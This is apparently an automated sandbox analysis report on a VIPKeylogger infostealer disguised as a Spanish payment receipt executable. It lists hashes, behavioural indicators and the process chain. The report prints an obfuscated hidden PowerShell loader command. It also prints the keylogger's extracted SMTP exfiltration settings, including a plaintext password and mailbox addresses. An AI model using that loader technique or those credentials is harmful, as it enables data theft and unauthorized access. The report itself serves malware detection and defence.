Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/10/2024, 12:00
Static task
static1
Behavioral task
behavioral1
Sample
JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Scyphus/Chefassistent.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Scyphus/Chefassistent.ps1
Resource
win10v2004-20241007-en
General
-
Target
JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe
-
Size
762KB
-
MD5
91ab88ebf2f83aa5c1b1979c37b9ffd3
-
SHA1
463501f21d5062bfd8f5acb5efd3c8e387e0bb0d
-
SHA256
94786b06c92a58b375e26bc1328492f06baed13f77e8140f8a2cc892883b4c1e
-
SHA512
7823d581290e5e53b11320ada2fa88346a1ed58dbd19476f3ee7a6b1e4ec26e21fe841975d93133afc87f820e95844baad34449d0aa6ac20077f2d9123af3fc4
-
SSDEEP
12288:EPpIEmdhqR0GV9XOOxg+Jf1PcezkBWIbyuwQL3OWntl81tTTZ/Oi5DwFyEionDu1:IpaCWGHXOOxgveC5yRQLvf81BV2m6iow
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.dimarbus.com - Port:
587 - Username:
[email protected] - Password:
efe639812G - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1940 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 41 116 msiexec.exe 43 116 msiexec.exe 45 116 msiexec.exe 47 116 msiexec.exe 50 116 msiexec.exe 53 116 msiexec.exe 55 116 msiexec.exe 59 116 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 40 drive.google.com 41 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 52 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\folkepensionsaldres\frostbiter.ini JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 116 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1940 powershell.exe 116 msiexec.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Levitters.lnk JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe File opened for modification C:\Windows\Levitters.lnk JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 116 msiexec.exe 116 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1940 powershell.exe Token: SeIncreaseQuotaPrivilege 1940 powershell.exe Token: SeSecurityPrivilege 1940 powershell.exe Token: SeTakeOwnershipPrivilege 1940 powershell.exe Token: SeLoadDriverPrivilege 1940 powershell.exe Token: SeSystemProfilePrivilege 1940 powershell.exe Token: SeSystemtimePrivilege 1940 powershell.exe Token: SeProfSingleProcessPrivilege 1940 powershell.exe Token: SeIncBasePriorityPrivilege 1940 powershell.exe Token: SeCreatePagefilePrivilege 1940 powershell.exe Token: SeBackupPrivilege 1940 powershell.exe Token: SeRestorePrivilege 1940 powershell.exe Token: SeShutdownPrivilege 1940 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeSystemEnvironmentPrivilege 1940 powershell.exe Token: SeRemoteShutdownPrivilege 1940 powershell.exe Token: SeUndockPrivilege 1940 powershell.exe Token: SeManageVolumePrivilege 1940 powershell.exe Token: 33 1940 powershell.exe Token: 34 1940 powershell.exe Token: 35 1940 powershell.exe Token: 36 1940 powershell.exe Token: SeDebugPrivilege 116 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2020 wrote to memory of 1940 2020 JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe 86 PID 2020 wrote to memory of 1940 2020 JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe 86 PID 2020 wrote to memory of 1940 2020 JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe 86 PID 1940 wrote to memory of 116 1940 powershell.exe 96 PID 1940 wrote to memory of 116 1940 powershell.exe 96 PID 1940 wrote to memory of 116 1940 powershell.exe 96 PID 1940 wrote to memory of 116 1940 powershell.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Zinged=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\Stragglier\Scyphus\Chefassistent.Tro';$bagwyn=$Zinged.SubString(52013,3);.$bagwyn($Zinged)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:116
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD541ba1786c8305fd337a4c1c154d091af
SHA1848c471b48a57010eb18a329a974c514fe3d4009
SHA2564fbbbd334722419f51ab3c5d956dd5feea3bc63dcd998bdc3cc987879de16d9f
SHA5128926c198c1060c4724891a6cf192749eb5ff7dbc202d2c255be2448c24b45a161380ab3a8ec31cffc4e4091886b6b44e498eb1fd69eb75ba0a205ea31c1edf74
-
Filesize
300KB
MD5137eeabecd5cfabf824f54b74e86916f
SHA1b8759dd6c9a3d4aef893109e9991ca0f5c85f0fd
SHA2569508f5c43aa379200efd79ed51cbb73a72d7079770a5abfd3772bcb31d696ce9
SHA51250150337ff517324f5ce17e921949d04af39af071ffd241b052e3ff7327db01e29820a7ecfd04d0031b2a3afc06c4d1cd9eaa4392018878c240371fbc8778541
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82